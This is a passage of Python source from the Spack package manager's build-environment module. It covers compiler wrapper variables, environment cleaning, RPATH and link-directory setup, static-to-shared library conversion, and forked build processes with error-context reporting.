from spack.util.module_cmd import load_module, get_path_from_module, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'

#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
# Directories containing the compiler wrappers (prepended to PATH).
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
# Include / link / RPATH search directories gathered from dependencies.
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
# NOTE(review): the next four names are not set or read anywhere in this
# module; presumably consumed by the wrapper scripts -- confirm.
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
# Debug-logging variables (set when config:debug is enabled).
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'

# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
    """Callable wrapper around ``make`` that supports per-invocation
    parallelism options.

    Passing ``parallel`` to a call overrides the package-wide default,
    so a package can default to serial builds while parallelizing
    specific invocations (or vice versa).  Passing ``jobs_env`` names an
    environment variable that will be set to the parallelism level,
    without changing the normal ``-j`` handling.

    If the SPACK_NO_PARALLEL_MAKE environment variable is set, it
    overrides everything and builds are always serial.
    """

    def __init__(self, name, jobs):
        super(MakeExecutable, self).__init__(name)
        self.jobs = jobs

    def __call__(self, *args, **kwargs):
        """Swallow ``parallel`` and ``jobs_env`` from kwargs; everything
        else is forwarded to the superclass call.
        """
        if env_flag(SPACK_NO_PARALLEL_MAKE):
            run_parallel = False
        else:
            run_parallel = kwargs.pop('parallel', self.jobs > 1)

        if run_parallel:
            args = ('-j{0}'.format(self.jobs),) + args

        env_var = kwargs.pop('jobs_env', None)
        if env_var:
            # Caller asked for an environment variable that carries the
            # parallelism level.
            kwargs['extra_env'] = {env_var: str(self.jobs)}

        return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
    # Sanitize the build environment: strip anything the user has set
    # that could interfere with the build.  Applied immediately (unlike
    # the other setup functions) so it does not clobber what modules
    # load later.
    env = EnvironmentModifications()

    # These variables can change how packages locate libraries; drop
    # them so builds never pull in unintended external dependencies.
    for var in ('LD_LIBRARY_PATH', 'CRAY_LD_LIBRARY_PATH', 'LIBRARY_PATH',
                'CPATH', 'LD_RUN_PATH', 'DYLD_LIBRARY_PATH',
                'DYLD_FALLBACK_LIBRARY_PATH'):
        env.unset(var)

    # Remove all pkgconfig stuff from craype
    for name in os.environ.keys():
        if 'PKGCONF' in name:
            env.unset(name)

    build_lang = spack.config.get('config:build_language')
    if build_lang:
        # Force compiler messages into a known language (usually
        # English) so parse_log_events can match them.
        env.set('LC_ALL', build_lang)

    # Drop macports directories from PATH: the macports ld conflicts
    # with the built-in linker on El Capitan (assembler errors such as
    # "suffix or operands invalid for `movq'").
    for entry in get_path('PATH'):
        if '/macports/' in entry:
            env.remove_path('PATH', entry)

    env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
    """Populate ``env`` with the variables Spack's compiler wrappers read
    to locate and invoke the real compilers for ``pkg``.

    Args:
        pkg: package being built; its spec must already be concrete
        env (EnvironmentModifications): accumulator for the changes

    Returns:
        the same ``env`` object, extended in place
    """
    assert pkg.spec.concrete
    compiler = pkg.compiler
    spec = pkg.spec

    # Set compiler variables used by CMake and autotools
    assert all(key in compiler.link_paths for key in (
        'cc', 'cxx', 'f77', 'fc'))

    # Populate an object with the list of environment modifications
    # and return it
    # TODO : add additional kwargs for better diagnostics, like requestor,
    # ttyout, ttyerr, etc.
    link_dir = spack.paths.build_env_path

    # Set SPACK compiler variables so that our wrapper knows what to call.
    # CC/CXX/F77/FC point at the wrappers; SPACK_* carry the real paths.
    if compiler.cc:
        env.set('SPACK_CC', compiler.cc)
        env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
    if compiler.cxx:
        env.set('SPACK_CXX', compiler.cxx)
        env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
    if compiler.f77:
        env.set('SPACK_F77', compiler.f77)
        env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
    if compiler.fc:
        env.set('SPACK_FC', compiler.fc)
        env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))

    # Set SPACK compiler rpath flags so that our wrapper knows what to use
    env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
    env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
    env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
    env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
    env.set('SPACK_LINKER_ARG', compiler.linker_arg)

    # Check whether we want to force RPATH or RUNPATH
    if spack.config.get('config:shared_linking') == 'rpath':
        env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
        env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
    else:
        env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
        env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)

    # Set the target parameters that the compiler will add
    isa_arg = spec.architecture.target.optimization_flags(compiler)
    env.set('SPACK_TARGET_ARGS', isa_arg)

    # Trap spack-tracked compiler flags as appropriate.
    # env_flags are easy to accidentally override.
    inject_flags = {}
    env_flags = {}
    build_system_flags = {}
    for flag in spack.spec.FlagMap.valid_compiler_flags():
        # Always convert flag_handler to function type.
        # This avoids discrepancies in calling conventions between functions
        # and methods, or between bound and unbound methods in python 2.
        # We cannot effectively convert everything to a bound method, which
        # would be the simpler solution.
        if isinstance(pkg.flag_handler, types.FunctionType):
            handler = pkg.flag_handler
        else:
            if sys.version_info >= (3, 0):
                handler = pkg.flag_handler.__func__
            else:
                handler = pkg.flag_handler.im_func

        injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
        inject_flags[flag] = injf or []
        env_flags[flag] = envf or []
        build_system_flags[flag] = bsf or []

    # Place compiler flags as specified by flag_handler
    for flag in spack.spec.FlagMap.valid_compiler_flags():
        # Concreteness guarantees key safety here
        if inject_flags[flag]:
            # variables SPACK_<FLAG> inject flags through wrapper
            var_name = 'SPACK_{0}'.format(flag.upper())
            env.set(var_name, ' '.join(f for f in inject_flags[flag]))
        if env_flags[flag]:
            # implicit variables
            env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
    pkg.flags_to_build_system_args(build_system_flags)

    env.set('SPACK_COMPILER_SPEC', str(spec.compiler))

    env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))

    compiler.setup_custom_environment(pkg, env)

    return env
def set_build_environment_variables(pkg, env, dirty):
    """Ensure a clean install environment when we build packages.

    This involves unsetting pesky environment variables that may
    affect the build. It also involves setting environment variables
    used by Spack's compiler wrappers.

    Args:
        pkg: The package we are building
        env: The build environment
        dirty (bool): Skip unsetting the user's environment settings

    Returns:
        the same ``env`` object, extended in place
    """
    # Gather information about various types of dependencies
    build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
    link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
    build_link_deps = build_deps | link_deps
    rpath_deps = get_rpath_deps(pkg)

    link_dirs = []
    include_dirs = []
    rpath_dirs = []

    # The top-level package is always RPATHed. It hasn't been installed yet
    # so the RPATHs are added unconditionally (e.g. even though lib64/ may
    # not be created for the install).
    for libdir in ['lib', 'lib64']:
        lib_path = os.path.join(pkg.prefix, libdir)
        rpath_dirs.append(lib_path)

    # Set up link, include, RPATH directories that are passed to the
    # compiler wrapper
    for dep in link_deps:
        if is_system_path(dep.prefix):
            continue
        query = pkg.spec[dep.name]
        dep_link_dirs = list()
        try:
            dep_link_dirs.extend(query.libs.directories)
        except NoLibrariesError:
            tty.debug("No libraries found for {0}".format(dep.name))

        # Fall back to conventional lib/ and lib64/ directories under the
        # prefix when the dependency does not advertise its libraries.
        for default_lib_dir in ['lib', 'lib64']:
            default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
            if os.path.isdir(default_lib_prefix):
                dep_link_dirs.append(default_lib_prefix)

        link_dirs.extend(dep_link_dirs)
        if dep in rpath_deps:
            rpath_dirs.extend(dep_link_dirs)

        try:
            include_dirs.extend(query.headers.directories)
        except NoHeadersError:
            tty.debug("No headers found for {0}".format(dep.name))

    link_dirs = list(dedupe(filter_system_paths(link_dirs)))
    include_dirs = list(dedupe(filter_system_paths(include_dirs)))
    rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))

    env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
    env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
    env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))

    build_prefixes = [dep.prefix for dep in build_deps]
    build_link_prefixes = [dep.prefix for dep in build_link_deps]

    # add run-time dependencies of direct build-time dependencies:
    for build_dep in build_deps:
        for run_dep in build_dep.traverse(deptype='run'):
            build_prefixes.append(run_dep.prefix)

    # Filter out system paths: ['/', '/usr', '/usr/local']
    # These paths can be introduced into the build when an external package
    # is added as a dependency. The problem with these paths is that they often
    # contain hundreds of other packages installed in the same directory.
    # If these paths come first, they can overshadow Spack installations.
    build_prefixes = filter_system_paths(build_prefixes)
    build_link_prefixes = filter_system_paths(build_link_prefixes)

    # Add dependencies to CMAKE_PREFIX_PATH
    env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)

    # Set environment variables if specified for
    # the given compiler
    compiler = pkg.compiler
    env.extend(spack.schema.environment.parse(compiler.environment))

    if compiler.extra_rpaths:
        extra_rpaths = ':'.join(compiler.extra_rpaths)
        env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)

    implicit_rpaths = compiler.implicit_rpaths()
    if implicit_rpaths:
        env.set('SPACK_COMPILER_IMPLICIT_RPATHS', ':'.join(implicit_rpaths))

    # Add bin directories from dependencies to the PATH for the build.
    for prefix in build_prefixes:
        for dirname in ['bin', 'bin64']:
            bin_dir = os.path.join(prefix, dirname)
            if os.path.isdir(bin_dir):
                env.prepend_path('PATH', bin_dir)

    # Add spack build environment path with compiler wrappers first in
    # the path. We add the compiler wrapper path, which includes default
    # wrappers (cc, c++, f77, f90), AND a subdirectory containing
    # compiler-specific symlinks. The latter ensures that builds that
    # are sensitive to the *name* of the compiler see the right name when
    # we're building with the wrappers.
    #
    # Conflicts on case-insensitive systems (like "CC" and "cc") are
    # handled by putting one in the <build_env_path>/case-insensitive
    # directory. Add that to the path too.
    env_paths = []
    compiler_specific = os.path.join(
        spack.paths.build_env_path, pkg.compiler.name)
    for item in [spack.paths.build_env_path, compiler_specific]:
        env_paths.append(item)
        ci = os.path.join(item, 'case-insensitive')
        if os.path.isdir(ci):
            env_paths.append(ci)

    for item in env_paths:
        env.prepend_path('PATH', item)
    env.set_path(SPACK_ENV_PATH, env_paths)

    # Working directory for the spack command itself, for debug logs.
    if spack.config.get('config:debug'):
        env.set(SPACK_DEBUG, 'TRUE')
        env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
        env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
        env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)

    # Find ccache binary and hand it to build environment
    if spack.config.get('config:ccache'):
        ccache = Executable('ccache')
        if not ccache:
            raise RuntimeError("No ccache binary found in PATH")
        env.set(SPACK_CCACHE_BINARY, ccache)

    # Add any pkgconfig directories to PKG_CONFIG_PATH
    for prefix in build_link_prefixes:
        for directory in ('lib', 'lib64', 'share'):
            pcdir = os.path.join(prefix, directory, 'pkgconfig')
            if os.path.isdir(pcdir):
                env.prepend_path('PKG_CONFIG_PATH', pcdir)

    return env
def _set_variables_for_single_module(pkg, module):
    """Helper function to set module variables for a single module.

    Injects command-like helpers (make, cmake, configure, ...) and
    filesystem shortcuts into ``module`` so package install() code can
    use them without prefixes.
    """
    # Put a marker on this module so that it won't execute the body of this
    # function again, since it is not needed
    marker = '_set_run_already_called'
    if getattr(module, marker, False):
        return

    # Parallelism: honor config:build_jobs (default 16) but never exceed
    # the host CPU count; serial packages always get one job.
    jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
    jobs = min(jobs, multiprocessing.cpu_count())
    assert jobs is not None, "no default set for config:build_jobs"

    m = module
    m.make_jobs = jobs

    # TODO: make these build deps that can be installed if not found.
    m.make = MakeExecutable('make', jobs)
    m.gmake = MakeExecutable('gmake', jobs)
    m.scons = MakeExecutable('scons', jobs)
    m.ninja = MakeExecutable('ninja', jobs)

    # easy shortcut to os.environ
    m.env = os.environ

    # Find the configure script in the archive path
    # Don't use which for this; we want to find it in the current dir.
    m.configure = Executable('./configure')

    m.meson = Executable('meson')
    m.cmake = Executable('cmake')
    m.ctest = MakeExecutable('ctest', jobs)

    # Standard CMake arguments
    m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
    m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)

    # Put spack compiler paths in module scope.
    link_dir = spack.paths.build_env_path
    m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
    m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
    m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
    m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])

    # Emulate some shell commands for convenience
    m.pwd = os.getcwd
    m.cd = os.chdir
    m.mkdir = os.mkdir
    m.makedirs = os.makedirs
    m.remove = os.remove
    m.removedirs = os.removedirs
    m.symlink = os.symlink

    m.mkdirp = mkdirp
    m.install = install
    m.install_tree = install_tree
    m.rmtree = shutil.rmtree
    m.move = shutil.move

    # Useful directories within the prefix are encapsulated in
    # a Prefix object.
    m.prefix = pkg.prefix

    # Platform-specific library suffix.
    m.dso_suffix = dso_suffix

    def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
        # Convenience wrapper bound to this package's architecture; the
        # compiler defaults to spack_cc unless overridden via kwargs.
        compiler_path = kwargs.get('compiler', m.spack_cc)
        compiler = Executable(compiler_path)

        return _static_to_shared_library(pkg.spec.architecture, compiler,
                                         static_lib, shared_lib, **kwargs)

    m.static_to_shared_library = static_to_shared_library

    # Put a marker on this module so that it won't execute the body of this
    # function again, since it is not needed
    setattr(m, marker, True)
def set_module_variables_for_package(pkg):
    """Populate the module scope of install() with some useful functions.
    This makes things easier for package writers.
    """
    # A user package class may inherit from a class in another repo,
    # e.g. spack.pkg.mystuff.libelf.Libelf deriving from
    # spack.pkg.original.libelf.Libelf.  Set the variables on every
    # module in the class hierarchy so the parent class can still use
    # them if it gets called; parent_class_modules includes pkg.module.
    for mod in parent_class_modules(pkg.__class__):
        _set_variables_for_single_module(pkg, mod)
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
                              **kwargs):
    """
    Converts a static library to a shared library. The static library has to
    be built with PIC for the conversion to work.

    Also creates unversioned symlinks when a version or compat_version is
    given, and returns the compiler invocation's output.

    Parameters:
        arch (str): architecture string; 'linux'/'cray' vs. 'darwin'
            substrings select which linker flags are used.
        compiler (Executable): compiler used to perform the link.
        static_lib (str): Path to the static library.
        shared_lib (str): Path to the shared library. Default is to derive
                          from the static library's path.

    Keyword arguments:
        compiler (str): Path to the compiler. Default is spack_cc.
        compiler_output: Where to print compiler output to.
        arguments (str list): Additional arguments for the compiler.
        version (str): Library version. Default is unspecified.
        compat_version (str): Library compatibility version. Default is
                              version.
    """
    compiler_output = kwargs.get('compiler_output', None)
    arguments = kwargs.get('arguments', [])
    version = kwargs.get('version', None)
    compat_version = kwargs.get('compat_version', version)

    if not shared_lib:
        # Derive the shared library name by swapping the extension for
        # the platform's dso suffix.
        shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
                                      dso_suffix)

    compiler_args = []
    # TODO: Compiler arguments should not be hardcoded but provided by
    # the different compiler classes.
    if 'linux' in arch or 'cray' in arch:
        # GNU-style link: whole-archive pulls every object out of the
        # static lib; soname carries the compat version if present.
        soname = os.path.basename(shared_lib)

        if compat_version:
            soname += '.{0}'.format(compat_version)

        compiler_args = [
            '-shared',
            '-Wl,-soname,{0}'.format(soname),
            '-Wl,--whole-archive',
            static_lib,
            '-Wl,--no-whole-archive'
        ]
    elif 'darwin' in arch:
        # macOS link: -force_load is the whole-archive equivalent;
        # install_name carries the compat version if present.
        install_name = shared_lib

        if compat_version:
            install_name += '.{0}'.format(compat_version)

        compiler_args = [
            '-dynamiclib',
            '-install_name', '{0}'.format(install_name),
            '-Wl,-force_load,{0}'.format(static_lib)
        ]

        if compat_version:
            compiler_args.extend(['-compatibility_version', '{0}'.format(
                compat_version)])

        if version:
            compiler_args.extend(['-current_version', '{0}'.format(version)])

    if len(arguments) > 0:
        compiler_args.extend(arguments)

    shared_lib_base = shared_lib

    # The output file name gets the (compat) version appended.
    if version:
        shared_lib += '.{0}'.format(version)
    elif compat_version:
        shared_lib += '.{0}'.format(compat_version)

    compiler_args.extend(['-o', shared_lib])

    # Create symlinks for version and compat_version
    shared_lib_link = os.path.basename(shared_lib)

    if version or compat_version:
        # Unversioned name -> versioned library
        os.symlink(shared_lib_link, shared_lib_base)

    if compat_version and compat_version != version:
        # Compat-versioned name -> fully-versioned library
        os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
                                                     compat_version))

    return compiler(*compiler_args, output=compiler_output)
def get_rpath_deps(pkg):
    """Return immediate or transitive RPATH dependencies for a package.

    Transitive packages get every link dependency in the spec DAG;
    otherwise only the direct link dependencies are returned.
    """
    if not pkg.transitive_rpaths:
        return pkg.spec.dependencies(deptype='link')
    return list(pkg.spec.traverse(root=False, deptype='link'))
def get_rpaths(pkg):
    """Get a list of all the rpaths for a package."""
    deps = get_rpath_deps(pkg)
    rpaths = [pkg.prefix.lib, pkg.prefix.lib64]

    # All existing lib/ directories of dependencies, then lib64/.
    for attr in ('lib', 'lib64'):
        for dep in deps:
            candidate = getattr(dep.prefix, attr)
            if os.path.isdir(candidate):
                rpaths.append(candidate)

    # Second module is our compiler mod name. We use that to get rpaths
    # from module show output.
    mods = pkg.compiler.modules
    if mods and len(mods) > 1:
        rpaths.append(get_path_from_module(mods[1]))

    return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
    """List of standard arguments used if a package is a CMakePackage.

    Args:
        pkg (PackageBase): package under consideration

    Returns:
        list of str: standard cmake arguments that would be used if this
        package were a CMakePackage instance.
    """
    return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
    """List of standard arguments used if a package is a MesonPackage.

    Args:
        pkg (PackageBase): package under consideration

    Returns:
        list of str: standard meson arguments that would be used if this
        package were a MesonPackage instance.
    """
    return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
    """
    Get list of superclass modules that descend from spack.package.PackageBase

    Includes cls.__module__
    """
    base = spack.package.PackageBase
    # Stop at classes outside the PackageBase hierarchy and at
    # PackageBase itself (issubclass(base, cls) is true for it and its
    # own ancestors).
    if not issubclass(cls, base) or issubclass(base, cls):
        return []

    result = []
    mod = sys.modules.get(cls.__module__)
    if mod:
        result.append(mod)
    for parent in cls.__bases__:
        result.extend(parent_class_modules(parent))
    return result
def load_external_modules(pkg):
    """Traverse a package's spec DAG and load any external modules.

    Walks the whole dependency DAG (root included) and loads the
    external module associated with each dependency that has one.

    Args:
        pkg (PackageBase): package to load deps for
    """
    for dep in list(pkg.spec.traverse()):
        module_name = dep.external_module
        if module_name:
            load_module(module_name)
def setup_package(pkg, dirty):
    """Execute all environment setup routines.

    Args:
        pkg (PackageBase): the package being built
        dirty (bool): if True, do NOT clean the user environment first

    The ordering below is significant: compiler/build variables are
    applied before module loads so module changes win where intended.
    """
    build_env = EnvironmentModifications()
    if not dirty:
        clean_environment()
    set_compiler_environment_variables(pkg, build_env)
    set_build_environment_variables(pkg, build_env, dirty)
    pkg.architecture.platform.setup_platform_environment(pkg, build_env)
    build_env.extend(
        modifications_from_dependencies(pkg.spec, context='build')
    )
    if (not dirty) and (not build_env.is_unset('CPATH')):
        tty.debug("A dependency has updated CPATH, this may lead pkg-config"
                  " to assume that the package is part of the system"
                  " includes and omit it when invoked with '--cflags'.")
    set_module_variables_for_package(pkg)
    pkg.setup_build_environment(build_env)
    # Loading modules, in particular if they are meant to be used outside
    # of Spack, can change environment variables that are relevant to the
    # build of packages. To avoid a polluted environment, preserve the
    # value of a few, selected, environment variables
    # With the current ordering of environment modifications, this is strictly
    # unnecessary. Modules affecting these variables will be overwritten anyway
    with preserve_environment('CC', 'CXX', 'FC', 'F77'):
        # All module loads that otherwise would belong in previous
        # functions have to occur after the build_env object has its
        # modifications applied. Otherwise the environment modifications
        # could undo module changes, such as unsetting LD_LIBRARY_PATH
        # after a module changes it.
        for mod in pkg.compiler.modules:
            # Fixes issue https://github.com/spack/spack/issues/3153
            if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
                load_module("cce")
            load_module(mod)
        # kludge to handle cray libsci being automatically loaded by PrgEnv
        # modules on cray platform. Module unload does no damage when
        # unnecessary
        module('unload', 'cray-libsci')
        if pkg.architecture.target.module_name:
            load_module(pkg.architecture.target.module_name)
        load_external_modules(pkg)
    # Make sure nothing's strange about the Spack environment.
    validate(build_env, tty.warn)
    build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
    """Returns the environment modifications that are required by
    the dependencies of a spec and also applies modifications
    to this spec's package at module scope, if need be.

    Args:
        spec (Spec): spec for which we want the modifications
        context (str): either 'build' for build-time modifications or 'run'
            for run-time modifications

    Raises:
        KeyError: if *context* is not 'build' or 'run'.
    """
    env = EnvironmentModifications()
    pkg = spec.package
    # Maps the context to deptype and method to be called
    deptype_and_method = {
        'build': (('build', 'link', 'test'),
                  'setup_dependent_build_environment'),
        'run': (('link', 'run'), 'setup_dependent_run_environment')
    }
    deptype, method = deptype_and_method[context]
    # Post-order traversal: dependencies contribute before dependents;
    # the root itself is excluded.
    for dspec in spec.traverse(order='post', root=False, deptype=deptype):
        dpkg = dspec.package
        set_module_variables_for_package(dpkg)
        # Allow dependencies to modify the module
        dpkg.setup_dependent_package(pkg.module, spec)
        getattr(dpkg, method)(env, spec)
    return env
def fork(pkg, function, dirty, fake):
    """Fork a child process to do part of a spack build.

    Args:
        pkg (PackageBase): package whose environment we should set up the
            forked process for.
        function (callable): argless function to run in the child
            process.
        dirty (bool): If True, do NOT clean the environment before
            building.
        fake (bool): If True, skip package setup b/c it's not a real build

    Usage::

        def child_fun():
            # do stuff
        build_env.fork(pkg, child_fun)

    Forked processes are run with the build environment set up by
    spack.build_environment.  This allows package authors to have full
    control over the environment, etc. without affecting other builds
    that might be executed in the same spack call.

    If something goes wrong, the child process catches the error and
    passes it to the parent wrapped in a ChildError.  The parent is
    expected to handle (or re-raise) the ChildError.
    """
    def child_process(child_pipe, input_stream):
        # We are in the child process. Python sets sys.stdin to
        # open(os.devnull) to prevent our process and its parent from
        # simultaneously reading from the original stdin. But, we assume
        # that the parent process is not going to read from it till we
        # are done with the child, so we undo Python's precaution.
        if input_stream is not None:
            sys.stdin = input_stream
        try:
            if not fake:
                setup_package(pkg, dirty=dirty)
            return_value = function()
            # Success: ship the plain return value back to the parent.
            child_pipe.send(return_value)
        except StopPhase as e:
            # Do not create a full ChildError from this, it's not an error
            # it's a control statement.
            child_pipe.send(e)
        except BaseException:
            # catch ANYTHING that goes wrong in the child process
            exc_type, exc, tb = sys.exc_info()
            # Need to unwind the traceback in the child because traceback
            # objects can't be sent to the parent.
            tb_string = traceback.format_exc()
            # build up some context from the offending package so we can
            # show that, too.
            package_context = get_package_context(tb)
            build_log = None
            if hasattr(pkg, 'log_path'):
                build_log = pkg.log_path
            # make a pickleable exception to send to parent.
            msg = "%s: %s" % (exc_type.__name__, str(exc))
            ce = ChildError(msg,
                            exc_type.__module__,
                            exc_type.__name__,
                            tb_string, build_log, package_context)
            child_pipe.send(ce)
        finally:
            child_pipe.close()

    parent_pipe, child_pipe = multiprocessing.Pipe()
    input_stream = None
    try:
        # Forward sys.stdin when appropriate, to allow toggling verbosity
        if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
            input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
        p = multiprocessing.Process(
            target=child_process, args=(child_pipe, input_stream))
        p.start()
    except InstallError as e:
        e.pkg = pkg
        raise
    finally:
        # Close the input stream in the parent process
        if input_stream is not None:
            input_stream.close()

    # Whatever child_process sent (result, StopPhase, or ChildError).
    child_result = parent_pipe.recv()
    p.join()
    # If returns a StopPhase, raise it
    if isinstance(child_result, StopPhase):
        # do not print
        raise child_result
    # let the caller know which package went wrong.
    if isinstance(child_result, InstallError):
        child_result.pkg = pkg
    if isinstance(child_result, ChildError):
        # If the child process raised an error, print its output here rather
        # than waiting until the call to SpackError.die() in main(). This
        # allows exception handling output to be logged from within Spack.
        # see spack.main.SpackCommand.
        child_result.print_context()
        raise child_result
    return child_result
def get_package_context(traceback, context=3):
    """Return some context for an error message when the build fails.

    Args:
        traceback (traceback): A traceback from some exception raised during
            install
        context (int): Lines of context to show before and after the line
            where the error happened

    This function inspects the stack to find where we failed in the
    package file, and it adds detailed context to the long_message
    from there.

    Returns:
        list of str: a location header followed by marked-up source lines.
    """
    def make_stack(tb, stack=None):
        """Tracebacks come out of the system in caller -> callee order. Return
        an array in callee -> caller order so we can traverse it."""
        if stack is None:
            stack = []
        if tb is not None:
            make_stack(tb.tb_next, stack)
            stack.append(tb)
        return stack

    stack = make_stack(traceback)
    for tb in stack:
        frame = tb.tb_frame
        if 'self' in frame.f_locals:
            # Find the first proper subclass of PackageBase.
            obj = frame.f_locals['self']
            if isinstance(obj, spack.package.PackageBase):
                break
    # We found obj, the Package implementation we care about.
    # Point out the location in the install method where we failed.
    # NOTE(review): if no frame matches, `frame` is whatever the loop saw
    # last (or unbound for an empty traceback) -- confirm callers always
    # pass tracebacks that reach package code.
    lines = [
        '{0}:{1:d}, in {2}:'.format(
            inspect.getfile(frame.f_code),
            # NOTE(review): CPython documents f_lineno as 1-based; this -1
            # makes the printed number 0-based -- confirm it is intended.
            frame.f_lineno - 1,
            frame.f_code.co_name
        )
    ]
    # Build a message showing context in the install method.
    sourcelines, start = inspect.getsourcelines(frame)
    # Calculate lineno of the error relative to the start of the function.
    # Subtract 1 because f_lineno is 0-indexed.
    fun_lineno = frame.f_lineno - start - 1
    start_ctx = max(0, fun_lineno - context)
    sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
    for i, line in enumerate(sourcelines):
        is_error = start_ctx + i == fun_lineno
        mark = '>> ' if is_error else '   '
        # Add start to get lineno relative to start of file, not function.
        marked = '  {0}{1:-6d}{2}'.format(
            mark, start + start_ctx + i, line.rstrip())
        if is_error:
            marked = colorize('@R{%s}' % cescape(marked))
        lines.append(marked)
    return lines
class InstallError(spack.error.SpackError):
    """Raised by packages when a package fails to install.

    Any subclass of InstallError will be annotated by Spack with a
    ``pkg`` attribute on failure, which the caller can use to get the
    package for which the exception was raised.
    """
class ChildError(InstallError):
    """Special exception class for wrapping exceptions from child processes
    in Spack's build environment.

    The main features of a ChildError are:

    1. They're serializable, so when a child build fails, we can send one
       of these to the parent and let the parent report what happened.

    2. They have a ``traceback`` field containing a traceback generated
       on the child immediately after failure. Spack will print this on
       failure in lieu of trying to run sys.excepthook on the parent
       process, so users will see the correct stack trace from a child.

    3. They also contain context, which shows context in the Package
       implementation where the error happened. This helps people debug
       Python code in their packages. To get it, Spack searches the
       stack trace for the deepest frame where ``self`` is in scope and
       is an instance of PackageBase. This will generally find a useful
       spot in the ``package.py`` file.

    The long_message of a ChildError displays one of two things:

    1. If the original error was a ProcessError, indicating a command
       died during the build, we'll show context from the build log.

    2. If the original error was any other type of error, we'll show
       context from the Python code.

    SpackError handles displaying the special traceback if we're in debug
    mode with spack -d.
    """
    # List of errors considered "build errors", for which we'll show log
    # context instead of Python context.
    build_errors = [('spack.util.executable', 'ProcessError')]

    def __init__(self, msg, module, classname, traceback_string, build_log,
                 context):
        # module/classname identify the original exception type by name,
        # since the type itself may not be picklable.
        super(ChildError, self).__init__(msg)
        self.module = module
        self.name = classname
        self.traceback = traceback_string
        self.build_log = build_log
        self.context = context

    @property
    def long_message(self):
        """Detailed message: build-log excerpt or Python source context."""
        out = StringIO()
        out.write(self._long_message if self._long_message else '')
        if (self.module, self.name) in ChildError.build_errors:
            # The error happened in some external executed process. Show
            # the build log with errors or warnings highlighted.
            if self.build_log and os.path.exists(self.build_log):
                errors, warnings = parse_log_events(self.build_log)
                nerr = len(errors)
                nwar = len(warnings)
                if nerr > 0:
                    # If errors are found, only display errors
                    out.write(
                        "\n%s found in build log:\n" % plural(nerr, 'error'))
                    out.write(make_log_context(errors))
                elif nwar > 0:
                    # If no errors are found but warnings are, display warnings
                    out.write(
                        "\n%s found in build log:\n" % plural(nwar, 'warning'))
                    out.write(make_log_context(warnings))
        else:
            # The error happened in the Python code, so try to show
            # some context from the Package itself.
            if self.context:
                out.write('\n')
                out.write('\n'.join(self.context))
                out.write('\n')
        if out.getvalue():
            out.write('\n')
